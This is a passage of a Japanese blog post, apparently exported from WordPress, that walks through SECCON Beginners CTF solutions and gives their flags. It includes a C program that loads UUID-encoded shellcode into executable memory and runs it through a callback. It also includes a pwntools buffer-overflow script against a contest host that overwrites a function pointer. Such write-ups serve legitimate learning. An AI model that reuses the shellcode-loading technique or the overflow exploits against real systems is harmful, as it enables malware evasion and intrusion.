\u304c\u8fd4\u3055\u308c\u308b\u3002\u8981\u3059\u308b\u306b\u30e1\u30e2\u30ea\u306b\u3042\u308b\u6587\u5b57\u5217\u304c\u30d5\u30e9\u30b0\u304b\u3069\u3046\u304b\u30c1\u30a7\u30c3\u30af\u3057\u3066\u3044\u308b\u3002\u30d5\u30e9\u30b0\u3092\u69cb\u6210\u3059\u308b\u6587\u5b57\u306f\u4e0a\u8a18\u624b\u9806\u306e3.\u3067\u6bd4\u8f03\u3057\u3066\u3044\u308b\u5024\u3060\u304c\u3001\u30c1\u30a7\u30c3\u30af\u5bfe\u8c61\u306e\u30e1\u30e2\u30ea\u756a\u5730\u306f\u9806\u756a\u306b\u306a\u3063\u3066\u304a\u3089\u305a\u30d0\u30e9\u30d0\u30e9\u3067\u3042\u308b\u3002<\/p>\n\n\n\n<p>\u5168\u90e8\u306e\u30e1\u30e2\u30ea\u756a\u5730\u3092\u8a08\u7b97\u3057\u3066\u4e26\u3079\u66ff\u3048\u3066\u3084\u308c\u3070\u3044\u3044\u3060\u308d\u3046\u3002\u793e\u4f1a\u4eba\u306a\u306e\u3067\u5fc5\u9808\u30b9\u30ad\u30eb\u306eExcel\u3092\u4f7f\u3063\u3066\u8a08\u7b97\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-4.png\"><img loading=\"lazy\" decoding=\"async\" width=\"374\" height=\"678\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-4.png\" alt=\"\" class=\"wp-image-1206\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-4.png 374w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-4-165x300.png 165w\" sizes=\"auto, (max-width: 374px) 100vw, 374px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>\u3053\u308c\u3092\u30e1\u30e2\u30ea\u756a\u5730\u9806\u306b\u4e26\u3079\u66ff\u3048\u308b\u3068\u30d5\u30e9\u30b0\u304c\u5f97\u3089\u308c\u308b\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG: ctf4b{WAT_4n_345y_l0g1c!}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">reversing &#8211; MAFC<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>flag\u304c\u6b32\u3057\u3044\u304b\u3044\uff1f\u306a\u3089\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u89e3\u6790\u3057\u3066\u307f\u306a\u3002<br>Wanna get flag? if so, Reversing this Malware if you can<\/p>\n<\/blockquote>\n\n\n\n<p>\u4e0e\u3048\u3089\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u306f <code>MalwareAnalysis-FirstChallenge.exe<\/code> \u3068 <code>flag.encrypted<\/code> \u306e2\u3064\u3002\u30d5\u30a1\u30a4\u30eb\u540d\u304b\u3089\u60f3\u50cf\u3059\u308b\u306b <code>MalwareAnalysis-FirstChallenge.exe<\/code> \u3067\u30d5\u30e9\u30b0\u30d5\u30a1\u30a4\u30eb\u3092\u6697\u53f7\u5316\u3055\u308c\u305f\u3082\u306e\u304c <code>flag.encrypted<\/code> \u3067\u3042\u308d\u3046\u3002\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u3092\u89e3\u6790\u3057\u3066\u30d5\u30e9\u30b0\u30d5\u30a1\u30a4\u30eb\u3092\u5fa9\u53f7\u3059\u308c\u3070\u3088\u3044\u3068\u601d\u308f\u308c\u308b\u3002<\/p>\n\n\n\n<p><code>MalwareAnalysis-FirstChallenge.exe<\/code> \u3092\u89e3\u6790\u3059\u308b\u3068\u975e\u5e38\u306b\u30b9\u30c8\u30ec\u30fc\u30c8\u306a\u3084\u308a\u65b9\u3067 <code>flag.txt<\/code> \u3092AES\u3067\u6697\u53f7\u5316\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308b\u306e\u3067\u3001\u9375\u3084IV\u306a\u3069\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u3092\u540c\u3058\u3082\u306e\u306b\u3057\u3066\u5fa9\u53f7\u3059\u308b\u30d7\u30ed\u30b0\u30e9\u30e0\u3092\u66f8\u3044\u3066\u3084\u308c\u3070\u3088\u3044\u3002<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include &lt;Windows.h&gt;\n#include &lt;wincrypt.h&gt;\n\nint main(int argc, char** argv) {\n\tHANDLE enc, plain;\n\tHCRYPTPROV hProv;\n\tHCRYPTHASH hHash;\n\tHCRYPTKEY hKey;\n\tchar keydata&#x5B;] = &quot;ThisIsTheEncryptKey&quot;;\n\tDWORD param = 1;\n\tDWORD filesize, numberofbytesread = 0;\n\tBOOL bRet;\n\tDWORD errcode;\n\n\tenc = CreateFileA(&quot;flag.encrypted&quot;, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);\n\tplain = CreateFileA(&quot;flag.txt&quot;, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);\n\tbRet = CryptAcquireContextW(&amp;hProv, 0, L&quot;Microsoft Enhanced RSA and AES Cryptographic Provider&quot;, PROV_RSA_AES, 0);\n\tbRet = CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &amp;hHash);\n\tbRet = CryptHashData(hHash, (BYTE *)keydata, strlen(keydata), 0);\n\tbRet = CryptDeriveKey(hProv, CALG_AES_256, hHash, 0x1000000u, &amp;hKey);\n\tparam = PKCS5_PADDING;\n\tbRet = CryptSetKeyParam(hKey, KP_PADDING, (BYTE *)&amp;param, 0);\n\tbRet = CryptSetKeyParam(hKey, KP_IV, (BYTE *)L&quot;IVCanObfuscation&quot;, 0);\n\tparam = CRYPT_MODE_CBC;\n\tbRet = CryptSetKeyParam(hKey, KP_MODE, (BYTE *)&amp;param, 0);\n\n\tfilesize = GetFileSize(enc, 0);\n\tBYTE* filedata = (BYTE *)malloc(filesize);\n\tbRet = ReadFile(enc, filedata, filesize, &amp;numberofbytesread, 0);\n\tbRet = CryptDecrypt(hKey, 0, 1, 0, filedata, &amp;filesize);\n\tWriteFile(plain, filedata, filesize, &amp;numberofbytesread, 0);\n\n\treturn 0;\n}\n<\/pre><\/div>\n\n\n<p>\u3053\u308c\u3092\u5b9f\u884c\u3059\u308b\u3068\u5fa9\u53f7\u3055\u308c\u305f\u30d5\u30e9\u30b0\u304c <code>flag.txt<\/code> \u306b\u683c\u7d0d\u3055\u308c\u308b\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG: ctf4b{way_2_90!_y0u_suc3553d_2_ana1yz3_Ma1war3!!!} <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">reversing &#8211; code_injection<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u3042\u308b\u6761\u4ef6\u306e\u3068\u304d\u306b\u30d5\u30e9\u30b0\u304c\u8868\u793a\u3055\u308c\u308b\u307f\u305f\u3044\u3002<\/p>\n<\/blockquote>\n\n\n\n<p>PowerShell\u306e\u30d5\u30a1\u30a4\u30eb\u3068\u30c6\u30ad\u30b9\u30c8\u30d5\u30a1\u30a4\u30eb\u304c\u4e0e\u3048\u3089\u308c\u308b\u3002\u30c6\u30ad\u30b9\u30c8\u30d5\u30a1\u30a4\u30eb\u306e\u65b9\u306b\u306fUUID\u304c31\u500b\u66f8\u304b\u308c\u3066\u3044\u308b\u3002PowerShell\u306e\u65b9\u3067\u306f\u305d\u308c\u3092UUID\u3068\u3057\u3066\u30ed\u30fc\u30c9\u3057\u3066\u30e1\u30e2\u30ea\u306b\u683c\u7d0d\u3057\u3001\u305d\u306e\u30e1\u30e2\u30ea\u9818\u57df\u306e\u30a2\u30c9\u30ec\u30b9\u3092 <code>EnumSystemLocalesA<\/code> \u95a2\u6570\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u3068\u3057\u3066\u4e0e\u3048\u3066\u3044\u308b\u3002<\/p>\n\n\n\n<p>UUID\u3068\u3044\u3046\u306e\u306f128bit\u306e\u30c7\u30fc\u30bf\u3067\u3042\u308b\u305f\u3081\u3001\u5185\u90e8\u7684\u306b\u306f16\u30d0\u30a4\u30c8\u306e\u30c7\u30fc\u30bf\u306b\u306a\u308b\u3002\u3053\u306e\u305f\u3081\u3001UUID\u30c7\u30fc\u30bf\u3092\u683c\u7d0d\u3057\u305f\u9818\u57df\u306f16*31\u30d0\u30a4\u30c8\u306e\u9818\u57df\u3068\u306a\u308b\u3002<\/p>\n\n\n\n<p><code>EnumSystemLocalesA<\/code> \u95a2\u6570\u306e\u7b2c\u4e00\u30d1\u30e9\u30e1\u30fc\u30bf\u306b\u6e21\u3055\u308c\u305f\u30a2\u30c9\u30ec\u30b9\u306f\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u95a2\u6570\u3068\u3057\u3066\u6271\u308f\u308c\u308b\u3002\u3059\u306a\u308f\u3061\u3001UUID 31\u500b\u306e\u30c7\u30fc\u30bf\u3092\u683c\u7d0d\u3057\u305f\u30e1\u30e2\u30ea\u9818\u57df\u306e\u4e2d\u8eab\u306f\u95a2\u6570\u3068\u3057\u3066\u89e3\u91c8\u3067\u304d\u308b\u3068\u3044\u3046\u3053\u3068\u306b\u306a\u308b\u3002<\/p>\n\n\n\n<p>\u3067\u306f\u305d\u306e\u95a2\u6570\u3092\u89e3\u6790\u3057\u3088\u3046\u3002PowerShell\u30d5\u30a1\u30a4\u30eb\u3068\u540c\u3058\u51e6\u7406\u3092\u3059\u308b\u30d7\u30ed\u30b0\u30e9\u30e0\u3092\u4f5c\u6210\u3057\u3001IDA\u3067\u30c7\u30d0\u30c3\u30b0\u3057\u3066 <code>EnumSystemLocalesA<\/code> \u95a2\u6570\u306e\u5b9f\u884c\u76f4\u524d\u3067\u6b62\u3081\u308b\u3002<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include &lt;windows.h&gt;\n#include &lt;rpc.h&gt;\n\n#pragma comment(lib, &quot;Rpcrt4.lib&quot;)\n\nint main(int argc, char** argv) {\n\tUUID uuid&#x5B;31];\n\tBYTE* data = (BYTE *)&amp;uuid;\n    DWORD numberofbyteswritten = 0;\n\n    UuidFromStringA((RPC_CSTR)&quot;56525153-4157-4150-5155-4889e54883e4&quot;, &amp;uuid&#x5B;0]);\n    UuidFromStringA((RPC_CSTR)&quot;ec8348f0-6530-8b48-0425-60000000488b&quot;, &amp;uuid&#x5B;1]);\n    UuidFromStringA((RPC_CSTR)&quot;8b482040-80b0-0000-0083-3e000f84a701&quot;, &amp;uuid&#x5B;2]);\n    UuidFromStringA((RPC_CSTR)&quot;3e810000-0043-0054-7526-817e04460034&quot;, &amp;uuid&#x5B;3]);\n    UuidFromStringA((RPC_CSTR)&quot;811d7500-087e-0042-3d00-7514837e0c31&quot;, &amp;uuid&#x5B;4]);\n    UuidFromStringA((RPC_CSTR)&quot;8b480e75-481e-e3c1-0848-895c2420eb06&quot;, &amp;uuid&#x5B;5]);\n    UuidFromStringA((RPC_CSTR)&quot;02c68348-c3eb-4865-8b04-256000000048&quot;, &amp;uuid&#x5B;6]);\n    UuidFromStringA((RPC_CSTR)&quot;4818408b-408b-4820-8b00-488b7850488b&quot;, &amp;uuid&#x5B;7]);\n    UuidFromStringA((RPC_CSTR)&quot;20b9481f-2000-2000-0020-004809cb48c1&quot;, &amp;uuid&#x5B;8]);\n    UuidFromStringA((RPC_CSTR)&quot;334808e3-245c-4820-8b00-488b78504803&quot;, &amp;uuid&#x5B;9]);\n    UuidFromStringA((RPC_CSTR)&quot;20b9481f-2000-2000-0020-004809cb4889&quot;, &amp;uuid&#x5B;10]);\n    UuidFromStringA((RPC_CSTR)&quot;4820245c-588b-8b20-433c-4801d88bb888&quot;, &amp;uuid&#x5B;11]);\n    UuidFromStringA((RPC_CSTR)&quot;48000000-df01-778b-2048-01de48ba0540&quot;, &amp;uuid&#x5B;12]);\n    UuidFromStringA((RPC_CSTR)&quot;7d454e56-2a08-8948-5424-104831c98b14&quot;, &amp;uuid&#x5B;13]);\n    UuidFromStringA((RPC_CSTR)&quot;da01488e-3a81-6547-7453-7514817a0474&quot;, &amp;uuid&#x5B;14]);\n    UuidFromStringA((RPC_CSTR)&quot;75614864-810b-087a-6e64-6c657502eb05&quot;, &amp;uuid&#x5B;15]);\n    UuidFromStringA((RPC_CSTR)&quot;ebc1ff48-8bd9-2477-4801-de668b0c4e8b&quot;, &amp;uuid&#x5B;16]);\n    UuidFromStringA((RPC_CSTR)&quot;01481c77-8bde-8e04-4801-d848ba5b403a&quot;, &amp;uuid&#x5B;17]);\n    UuidFromStringA((RPC_CSTR)&quot;13404150-4852-5489-2418-b9f5ffffffff&quot;, &amp;uuid&#x5B;18]);\n    UuidFromStringA((RPC_CSTR)&quot;c08949d0-ba48-5908-0314-1059096b4889&quot;, &amp;uuid&#x5B;19]);\n    UuidFromStringA((RPC_CSTR)&quot;778b2414-4820-de01-4831-c98b148e4801&quot;, &amp;uuid&#x5B;20]);\n    UuidFromStringA((RPC_CSTR)&quot;573a81da-6972-7574-1481-7a0465436f6e&quot;, &amp;uuid&#x5B;21]);\n    UuidFromStringA((RPC_CSTR)&quot;7a810b75-7308-6c6f-6575-02eb0548ffc1&quot;, &amp;uuid&#x5B;22]);\n    UuidFromStringA((RPC_CSTR)&quot;778bd9eb-4824-de01-668b-0c4e48ba1f72&quot;, &amp;uuid&#x5B;23]);\n    UuidFromStringA((RPC_CSTR)&quot;13044e56-681c-8948-5424-088b771c4801&quot;, &amp;uuid&#x5B;24]);\n    UuidFromStringA((RPC_CSTR)&quot;8e048bde-0148-48d8-83ec-30488d542430&quot;, &amp;uuid&#x5B;25]);\n    UuidFromStringA((RPC_CSTR)&quot;48c93148-f983-7404-124c-8b4c24504c33&quot;, &amp;uuid&#x5B;26]);\n    UuidFromStringA((RPC_CSTR)&quot;894cca0c-ca0c-ff48-c1eb-e84c89c149c7&quot;, &amp;uuid&#x5B;27]);\n    UuidFromStringA((RPC_CSTR)&quot;000020c0-4d00-c931-48c7-442420000000&quot;, &amp;uuid&#x5B;28]);\n    UuidFromStringA((RPC_CSTR)&quot;48d0ff00-c483-eb30-0048-31c04889ec5d&quot;, &amp;uuid&#x5B;29]);\n    UuidFromStringA((RPC_CSTR)&quot;58415941-5e5f-595a-5bc3-000000000000&quot;, &amp;uuid&#x5B;30]);\n\n    BYTE* buf = (BYTE*)VirtualAlloc(NULL, 16 * 31, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n    HANDLE hFile = CreateFileA(&quot;output.dat&quot;, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);\n    for (int i = 0; i &lt; 31; i++) {\n        CopyMemory(buf + i * 16, &amp;uuid&#x5B;i], 16);\n        WriteFile(hFile, &amp;uuid&#x5B;i], 16, &amp;numberofbyteswritten, 0);\n    }\n    CloseHandle(hFile);\n\n    EnumSystemLocalesA((LOCALE_ENUMPROCA)buf, 0);\n\n    return 0;\n}\n<\/pre><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"509\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5-1024x509.png\" alt=\"\" class=\"wp-image-1207\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5-1024x509.png 1024w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5-300x149.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5-768x382.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5-624x310.png 624w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5.png 1192w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>\u305d\u306e\u72b6\u614b\u3067 <code>buf<\/code> \u306e\u6307\u3059\u30a2\u30c9\u30ec\u30b9\u3078\u884c\u304d\u30c7\u30fc\u30bf\u3092\u30b3\u30fc\u30c9\u3068\u3057\u3066\u89e3\u91c8\u3055\u305b\u308b\u3068\u3044\u3044\u611f\u3058\u306b\u95a2\u6570\u306b\u3067\u304d\u308b\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-6.png\"><img loading=\"lazy\" decoding=\"async\" width=\"857\" height=\"766\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-6.png\" alt=\"\" class=\"wp-image-1208\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-6.png 857w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-6-300x268.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-6-768x686.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-6-624x558.png 624w\" sizes=\"auto, (max-width: 857px) 100vw, 857px\" \/><\/a><\/figure>\n\n\n\n<p>\u30a2\u30bb\u30f3\u30d6\u30ea\u30b3\u30fc\u30c9\u3092ChatGPT\u306b\u6e21\u3057\u3066\u89e3\u8aac\u3055\u305b\u305f\u3089\u3044\u3044\u611f\u3058\u306b\u51fa\u3057\u3066\u304f\u308c\u305f\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-7.png\"><img loading=\"lazy\" decoding=\"async\" width=\"802\" height=\"435\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-7.png\" alt=\"\" class=\"wp-image-1209\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-7.png 802w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-7-300x163.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-7-768x417.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-7-624x338.png 624w\" sizes=\"auto, (max-width: 802px) 100vw, 802px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p><code>gs:60h<\/code> \u306fPEB\u3060\u304c <code>+20h<\/code> \u304c\u4f55\u304b\u3001\u305d\u306e\u5148\u306e <code>+80h<\/code> \u304c\u4f55\u304b\u3068\u3044\u3063\u305f\u60c5\u5831\u304c\u8db3\u308a\u306a\u304b\u3063\u305f\u306e\u3067\u8ffd\u52a0\u3067PEB\u306e\u69cb\u9020\u306a\u3069\u3092\u805e\u3044\u3066\u78ba\u8a8d\u3002\u7dcf\u5408\u3059\u308b\u3068\u524d\u534a\u3067\u306f\u74b0\u5883\u5909\u6570\u306b <code>CTF4B=1<\/code> \u3068\u3044\u3046\u6587\u5b57\u5217\u304c\u3042\u308b\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3057\u3001\u306a\u304b\u3063\u305f\u3089\u51e6\u7406\u3092\u7d42\u4e86\u3057\u3066\u3044\u308b\u3002<\/p>\n\n\n\n<p>\u74b0\u5883\u5909\u6570\u306b <code>CTF4B=1<\/code> \u3092\u8ffd\u52a0\u3057\u3066\u30d7\u30ed\u30b0\u30e9\u30e0\u3092\u5b9f\u884c\u3059\u308b\u3068\u3001\u30b3\u30f3\u30bd\u30fc\u30eb\u306b\u30d5\u30e9\u30b0\u304c\u51fa\u529b\u3055\u308c\u305f\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-8.png\"><img loading=\"lazy\" decoding=\"async\" width=\"613\" height=\"122\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-8.png\" alt=\"\" class=\"wp-image-1211\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-8.png 613w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-8-300x60.png 300w\" sizes=\"auto, (max-width: 613px) 100vw, 613px\" \/><\/a><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-code\"><code>FLAG: ctf4b{g3t_3nv1r0nm3n7_fr0m_p3b}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwnable &#8211; pet_name<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u30da\u30c3\u30c8\u306b\u540d\u524d\u3092\u4ed8\u3051\u307e\u3057\u3087\u3046\u3002\u3061\u306a\u307f\u306b\u30d5\u30e9\u30b0\u306f\/home\/pwn\/flag.txt\u306b\u66f8\u3044\u3066\u3042\u308b\u307f\u305f\u3044\u3067\u3059\u3002<\/p>\n\n\n\n<p><code>nc pet-name.challenges.beginners.seccon.jp 9080<\/code><\/p>\n<\/blockquote>\n\n\n\n<p>\u4e0e\u3048\u3089\u308c\u305f\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u3092\u898b\u308b\u3068\u30da\u30c3\u30c8\u540d\u3092\u5165\u308c\u308b\u30d0\u30c3\u30d5\u30a1\u306f32\u30d0\u30a4\u30c8\u3042\u308b\u304c\u3001<code>scanf<\/code> \u3067\u5165\u529b\u3057\u3066\u3044\u308b\u305f\u308132\u30d0\u30a4\u30c8\u4ee5\u4e0a\u8aad\u307f\u8fbc\u3081\u308b\u300232\u30d0\u30a4\u30c8\u3092\u8d85\u3048\u305f\u5206\u306f <code>path<\/code> \u5909\u6570\u3092\u4e0a\u66f8\u304d\u3059\u308b\u3053\u3068\u306b\u306a\u308b\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-17.png\"><img loading=\"lazy\" decoding=\"async\" width=\"397\" height=\"102\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-17.png\" alt=\"\" class=\"wp-image-1222\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-17.png 397w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-17-300x77.png 300w\" sizes=\"auto, (max-width: 397px) 100vw, 397px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>\u5f8c\u7d9a\u306e\u51e6\u7406\u3067 <code>path<\/code> \u5909\u6570\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u958b\u3044\u3066\u5185\u5bb9\u3092\u51fa\u529b\u3057\u3066\u3044\u308b\u305f\u3081\u3001<code>path<\/code> \u5909\u6570\u306b\u30d5\u30e9\u30b0\u30d5\u30a1\u30a4\u30eb\u306e\u30d1\u30b9\u3092\u5165\u308c\u308c\u3070\u30d5\u30e9\u30b0\u3092\u53d6\u5f97\u3067\u304d\u308b\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-18.png\"><img loading=\"lazy\" decoding=\"async\" width=\"848\" height=\"73\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-18.png\" alt=\"\" class=\"wp-image-1223\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-18.png 848w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-18-300x26.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-18-768x66.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-18-624x54.png 624w\" sizes=\"auto, (max-width: 848px) 100vw, 848px\" \/><\/a><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-code\"><code>Flag: ctf4b{3xp1oit_pet_n4me!}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwnable &#8211; pet_sound<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u30da\u30c3\u30c8\u306b\u9cf4\u304d\u58f0\u3092\u6559\u3048\u307e\u3057\u3087\u3046\u3002<\/p>\n\n\n\n<p><code>nc pet-sound.challenges.beginners.seccon.jp 9090<\/code><\/p>\n<\/blockquote>\n\n\n\n<p><code>nc<\/code> \u3067\u7e4b\u3050\u3068\u30e1\u30e2\u30ea\u30ec\u30a4\u30a2\u30a6\u30c8\u3092\u8868\u793a\u3057\u3066\u304f\u308c\u3066\u3055\u3089\u306b\u66f8\u304d\u63db\u3048\u5bfe\u8c61\u3082 &#8220;TARGET!&#8221; \u3068\u6307\u5b9a\u3057\u3066\u304f\u308c\u3066\u3044\u308b\u3002\u89aa\u5207\u3002\u30e6\u30fc\u30b6\u306e\u5165\u529b\u306f <code>pet_A->sound<\/code> \u306e\u305f\u3081\u3001<code>pet_A->speak<\/code> \u306e\u66f8\u304d\u63db\u3048\u306f\u3067\u304d\u306a\u3044\u3002\u6307\u5b9a\u3055\u308c\u3066\u3044\u308b\u901a\u308a <code>pet_B->speak<\/code> \u306e\u3068\u3053\u308d\u3092 <code>speak_flag<\/code> \u306b\u66f8\u304d\u63db\u3048\u3066\u3084\u308c\u3070\u3044\u3044\u3002<code>nc<\/code> \u3067\u30a4\u30f3\u30bf\u30e9\u30af\u30c6\u30a3\u30d6\u306b\u3084\u3063\u3066\u3044\u308b\u3068\u3053\u308d\u3067\u306f\u975eASCII\u6587\u5b57\u3092\u5165\u529b\u3067\u304d\u306a\u3044\u305f\u3081\u3001Python\u30b3\u30fc\u30c9\u3092\u66f8\u3044\u305f\u3002\u3082\u3057 <code>nc<\/code> \u4f7f\u3063\u3066\u89e3\u304f\u65b9\u6cd5\u304c\u3042\u308c\u3070\u6559\u3048\u3066\u307b\u3057\u3044\u3002<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\nfrom pwn import *\n\nconn = remote(&quot;pet-sound.challenges.beginners.seccon.jp&quot;, 9090)\nwhile True:\n    try:\n        line = conn.recvline()\n    except EOFError:\n        break\n\n    print(line.decode(errors = &#039;ignore&#039;), end = &#039;&#039;)\n\n    if b&quot;&#x5B;hint]&quot; in line:\n        speak_flag_addr_str = line.split(b&quot;0x&quot;)&#x5B;1]\n        speak_flag_addr = unhex(speak_flag_addr_str)&#x5B;::-1]\n        break\n\nsenddata = b&quot;A&quot; * 40 + speak_flag_addr\nconn.send(senddata)\n\nwhile True:\n    try:\n        line = conn.recvline()\n    except EOFError:\n        break\n    print(line.decode(errors = &#039;ignore&#039;), end = &#039;&#039;)\n<\/pre><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-19.png\"><img loading=\"lazy\" decoding=\"async\" width=\"690\" height=\"902\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-19.png\" alt=\"\" class=\"wp-image-1225\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-19.png 690w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-19-229x300.png 229w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-19-624x816.png 624w\" sizes=\"auto, (max-width: 690px) 100vw, 690px\" \/><\/a><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-code\"><code>Flag: ctf4b{y0u_expl0it_0v3rfl0w!}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwnable &#8211; pivot4b<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u30b9\u30bf\u30c3\u30af\u306f\u3042\u306a\u305f\u304c\u5275\u308a\u51fa\u3059\u3082\u306e\u3067\u3059\u3002<\/p>\n\n\n\n<p><code>nc pivot4b.challenges.beginners.seccon.jp 12300<\/code><\/p>\n<\/blockquote>\n\n\n\n<p>pwn\u3078\u305f\u304f\u305d\u30de\u30f3\u306f\u89e3\u3051\u306a\u304b\u3063\u305f\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u89e3\u3044\u305f\u306e\u3060\u3051<\/p>\n","protected":false},"author":1,"featured_media":1228,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[14],"tags":[8,23],"class_list":["post-1203","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","tag-ctf","tag-seccon"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/posts\/1203","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true